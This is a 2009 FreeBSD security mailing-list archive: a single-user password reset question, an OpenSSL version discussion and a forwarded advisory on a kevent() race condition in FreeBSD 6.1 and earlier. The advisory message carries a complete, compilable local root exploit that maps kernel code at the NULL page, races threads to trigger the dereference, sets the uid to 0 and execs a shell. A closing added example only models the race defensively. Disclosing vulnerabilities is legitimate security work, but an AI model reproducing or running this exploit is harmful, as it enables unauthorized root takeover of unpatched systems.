From davej at wsnet.co.za  Tue Aug 11 16:31:50 2009
From: davej at wsnet.co.za (Dave Johnson)
Date: Tue Aug 11 16:31:57 2009
Subject: Changing root password
Message-ID: <1250005118.7479.29.camel@linux-sw0o.site>

Hi all

I need some assistance

Op system : FreeBSD 7.2 with kernel update done in January 2009

Trying to log into root but getting wrong password.
I rebooted machine and logged in as a single user and got the following
message when I tried to change the password

Passwd: Pam Chauthtok () error in service module

Thanks for any help

From majs at joworld.net  Tue Aug 11 17:04:56 2009
From: majs at joworld.net (Jérôme Le Gal)
Date: Tue Aug 11 17:06:40 2009
Subject: Changing root password
In-Reply-To: <1250005118.7479.29.camel@linux-sw0o.site>
References: <1250005118.7479.29.camel@linux-sw0o.site>
Message-ID: <9469CD8A99B94714A87A425B9CB73831@nb03>

Hi,

It's normal, your file system is mounted in RO.

Try :
mount -a -t ufs

-----Original Message-----
From: owner-freebsd-security@freebsd.org
[mailto:owner-freebsd-security@freebsd.org] On behalf of Dave Johnson
Sent: Tuesday, 11 August 2009 17:39
To: freebsd-security@freebsd.org
Subject: Changing root password

Hi all

I need some assistance

Op system : FreeBSD 7.2 with kernel update done in January 2009

Trying to log into root but getting wrong password.
I rebooted machine and logged in as a single user and got the following
message when I tried to change the password

Passwd: Pam Chauthtok () error in service module

Thanks for any help

_______________________________________________
freebsd-security@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"

From jerome at joworld.net  Tue Aug 11 17:16:26 2009
From: jerome at joworld.net (Jérôme Le Gal)
Date: Tue Aug 11 17:16:33 2009
Subject: Changing root password
In-Reply-To: <1250005118.7479.29.camel@linux-sw0o.site>
References: <1250005118.7479.29.camel@linux-sw0o.site>
Message-ID:

Hi,

It's normal, your file system is mounted in RO.

Try to mount it in RW, for example :
mount -a -t ufs

-----Original Message-----
From: owner-freebsd-security@freebsd.org
[mailto:owner-freebsd-security@freebsd.org] On behalf of Dave Johnson
Sent: Tuesday, 11 August 2009 17:39
To: freebsd-security@freebsd.org
Subject: Changing root password

Hi all

I need some assistance

Op system : FreeBSD 7.2 with kernel update done in January 2009

Trying to log into root but getting wrong password.
I rebooted machine and logged in as a single user and got the following
message when I tried to change the password

Passwd: Pam Chauthtok () error in service module

Thanks for any help

From lxn.smth at gmail.com  Mon Aug 24 18:25:32 2009
From: lxn.smth at gmail.com (lxn smth)
Date: Mon Aug 24 21:07:12 2009
Subject: FreeBSD <= 6.1 kqueue() NULL pointer dereference
In-Reply-To: <4A90258F.6090606@freebsd.lublin.pl>
References: <4A90258F.6090606@freebsd.lublin.pl>
Message-ID: <864f75cb0908241101o309219d5x58261bb746eccb78@mail.gmail.com>

FYI.

2009/8/22 Przemyslaw Frasunek :
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> FreeBSD <= 6.1 suffers from classical check/use race condition on SMP
> systems in kevent() syscall, leading to kernel mode NULL pointer
> dereference. It can be triggered by spawning two threads:
> 1st thread looping on open() and close() syscalls, and the 2nd thread
> looping on kevent(), trying to add possibly invalid filedescriptor.
>
> The bug was fixed in 6.1-STABLE, just before release of 6.2-RELEASE, but
> was not recognized as security vulnerability.
>
> The following code exploits this vulnerability to run root shell.
>
> /* 22.08.2009, babcia padlina
>  * FreeBSD kevent() race condition exploit
>  *
>  * works only on multiprocessor systems
>  * gcc -o padlina padlina.c -lpthread
>  *
>  * with thanks to Pawel Pisarczyk for in-depth ia-32 architecture discussion
>  */
>
> #define _KERNEL
>
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
>
> #include
> #include
> #include
> #include
>
> int fd;
> int kq;
> struct kevent kev, ke[10];
> struct timespec timeout;
> int gotroot = 0;
>
> static void kernel_code(void) {
>         struct thread *thread;
>         gotroot = 1;
>         asm(
>                 "pushl %%eax;"
>                 "movl %%fs:0, %0"
>                 : "=r"(thread)
>         );
>         thread->td_proc->p_ucred->cr_uid = 0;
>         asm("popl %eax");
>         return;
> }
>
> void do_thread(void) {
>         sleep(1);
>
>         while (!gotroot) {
>                 memset(&kev, 0, sizeof(kev));
>                 EV_SET(&kev, fd, EVFILT_VNODE, EV_ADD, 0, 0, NULL);
>
>                 if (kevent(kq, &kev, 1, &ke, sizeof(ke), &timeout) < 0) {
>                         perror("kevent");
>                 }
>         }
>
> }
>
> void do_thread2(void) {
>         while(!gotroot) {
>                 if ((fd = open("/tmp/.padlina", O_RDWR | O_CREAT, 0600)) < 0)
>                         perror("open");
>
>                 close(fd);
>         }
> }
>
> int main(void) {
>         pthread_t pth, pth2;
>         long *ap;
>         unsigned char *p, *sp;
>
>         if (mmap(0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) {
>                 perror("mmap");
>                 return -1;
>         }
>
>         memset(0x0, 0xc3, 0x1000);
>
>         for (p = 0, sp = &kernel_code; *sp != 0xc3;)
>                         *p++ = *sp++;
>
>         if ((kq = kqueue()) < 0) {
>                 perror("kqueue");
>                 return -1;
>         }
>
>         pthread_create(&pth, NULL, do_thread, NULL);
>         pthread_create(&pth2, NULL, do_thread2, NULL);
>
>         timeout.tv_sec = 0;
>         timeout.tv_nsec = 1;
>
>         while (!gotroot)
>                 usleep(100);
>
>         setuid(0);
>         execl("/bin/sh", "sh", 0);
>
>         printf("exploit failed\n");
>         return 0;
> }
>
>
> - --
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
> * JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (MingW32)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
> iEYEARECAAYFAkqQJY8ACgkQkxEnBiV4/K1IRACeI/GYTKhzGqPJLkpheDV8rEIl
> yFMAnAo6czNexms9f4zMwUjzAioNRtqz
> =8qMi
> -----END PGP SIGNATURE-----
>

From c.kworr at gmail.com  Thu Aug 27 12:12:46 2009
From: c.kworr at gmail.com (Volodymyr Kostyrko)
Date: Thu Aug 27 12:52:15 2009
Subject: bundled openssl version
Message-ID: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com>

I'm just puzzled why we still stick to 0.9.8e. It's almost ancient.
Why not 0.9.8f? Doesn't someone need TLS extensions working?

--
Sphinx of black quartz judge my vow.

From jerome at joworld.net  Thu Aug 27 12:58:12 2009
From: jerome at joworld.net (Jérôme Le Gal)
Date: Thu Aug 27 12:58:19 2009
Subject: bundled openssl version
In-Reply-To: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com>
References: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com>
Message-ID:

Hi,

Why don't you use security/openssl ?

-----Original Message-----
From: owner-freebsd-security@freebsd.org
[mailto:owner-freebsd-security@freebsd.org] On behalf of Volodymyr Kostyrko
Sent: Thursday, 27 August 2009 13:52
To: freebsd-security@freebsd.org
Subject: bundled openssl version

I'm just puzzled why we still stick to 0.9.8e. It's almost ancient.
Why not 0.9.8f? Doesn't someone need TLS extensions working?

--
Sphinx of black quartz judge my vow.

From Gabor at Zahemszky.HU  Thu Aug 27 18:03:17 2009
From: Gabor at Zahemszky.HU (Zahemszky Gábor)
Date: Thu Aug 27 18:03:24 2009
Subject: bundled openssl version
In-Reply-To:
References: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com>
Message-ID: <20090827192946.7f5782c3@Picasso.Zahemszky.HU>

>> I'm just puzzled why we still stick to 0.9.8e. It's almost ancient.
>> Why not 0.9.8f? Doesn't someone need TLS extensions working?

> Why don't you use security/openssl ?

Why do we need a port, if we can / could use the program from the base
system?

Zahy < Gabor at Zahemszky dot HU >

--
#!/bin/ksh
Z='21N16I25C25E30, 40M30E33E25T15U!';
IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';
set -- $Z;for i;{ [[ $i = ? ]]&&print $i&&break;
[[ $i = ??? ]]&&j=$i&&i=${i%?};
typeset -i40 i=8#$i;print -n ${i#???};
[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};
IFS=' 0123456789 ';set -- $Z;for i;{ [[ $i = , ]]&&i=2;
[[ $i = ?? ]]||typeset -l i;j="$j $i";typeset +l i;};print "$j"

From leccine at gmail.com  Fri Aug 28 07:23:23 2009
From: leccine at gmail.com (István)
Date: Fri Aug 28 07:26:01 2009
Subject: bundled openssl version
In-Reply-To: <20090827192946.7f5782c3@Picasso.Zahemszky.HU>
References: <25ae98a90908270451m1d3c17b2nab12dc259f808848@mail.gmail.com>
	<20090827192946.7f5782c3@Picasso.Zahemszky.HU>
Message-ID:

custom flags -O666 and so on:)

On Thu, Aug 27, 2009 at 6:29 PM, Zahemszky Gábor wrote:

> >> I'm just puzzled why we still stick to 0.9.8e. It's almost ancient.
> >> Why not 0.9.8f? Doesn't someone need TLS extensions working?
>
> > Why don't you use security/openssl ?
>
> Why do we need a port, if we can / could use the program from the base
> system?
>
> Zahy < Gabor at Zahemszky dot HU >
>
> --
> #!/bin/ksh
> Z='21N16I25C25E30, 40M30E33E25T15U!';
> IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';
> set -- $Z;for i;{ [[ $i = ? ]]&&print $i&&break;
> [[ $i = ??? ]]&&j=$i&&i=${i%?};
> typeset -i40 i=8#$i;print -n ${i#???};
> [[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};
> IFS=' 0123456789 ';set -- $Z;for i;{ [[ $i = , ]]&&i=2;
> [[ $i = ?? ]]||typeset -l i;j="$j $i";typeset +l i;};print "$j"
>

--
the sun shines for all
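
[Added example, not part of any message in this archive and not FreeBSD or advisory code.] The "check/use race" named in the kevent() advisory forwarded above, reduced to a user-space model with the racy lookup beside a hardened one that fetches the entry once under a lock and holds a reference. All names (fdtable, register_racy, register_safe, model_open, model_close) are hypothetical, and the other CPU's close() is forced in through a callback so the outcome is deterministic.

```c
/* Constructed user-space model of a check/use race on a descriptor table.
 * Not FreeBSD kernel code: every name here is hypothetical. */
#include <pthread.h>
#include <stddef.h>

#define NFILES 8
#define WOULD_DEREF_NULL (-2)   /* marks where a kernel would use a NULL pointer */

struct file { int refs; int (*attach)(void); };

static int vnode_attach(void) { return 0; }
static struct file slot;
static struct file *fdtable[NFILES];
static pthread_mutex_t fdlock = PTHREAD_MUTEX_INITIALIZER;

static void drop(struct file *fp) {            /* caller holds fdlock */
    if (--fp->refs == 0) fp->attach = NULL;    /* last reference: object is gone */
}
void model_open(int fd) {
    pthread_mutex_lock(&fdlock);
    slot.refs = 1; slot.attach = vnode_attach; fdtable[fd] = &slot;
    pthread_mutex_unlock(&fdlock);
}
void model_close(int fd) {
    pthread_mutex_lock(&fdlock);
    if (fdtable[fd]) { drop(fdtable[fd]); fdtable[fd] = NULL; }
    pthread_mutex_unlock(&fdlock);
}
/* Racy: validate the descriptor, then fetch the table entry a second time.
 * `between` stands in for another CPU running close() inside the window. */
int register_racy(int fd, void (*between)(int)) {
    if (fd < 0 || fd >= NFILES || fdtable[fd] == NULL) return -1;  /* check */
    if (between) between(fd);
    struct file *fp = fdtable[fd];                                 /* use */
    return fp ? fp->attach() : WOULD_DEREF_NULL;
}
/* Hardened: fetch once under the lock, take a reference, use only that pointer. */
int register_safe(int fd, void (*between)(int)) {
    struct file *fp = NULL;
    if (fd < 0 || fd >= NFILES) return -1;
    pthread_mutex_lock(&fdlock);
    if ((fp = fdtable[fd]) != NULL) fp->refs++;
    pthread_mutex_unlock(&fdlock);
    if (fp == NULL) return -1;
    if (between) between(fd);            /* close() can run; fp stays valid */
    int rc = fp->attach();
    pthread_mutex_lock(&fdlock); drop(fp); pthread_mutex_unlock(&fdlock);
    return rc;
}
```

In the model, the racy path reports WOULD_DEREF_NULL exactly when a close lands between the check and the second fetch; the hardened path either fails cleanly with -1 or completes on the reference it already holds.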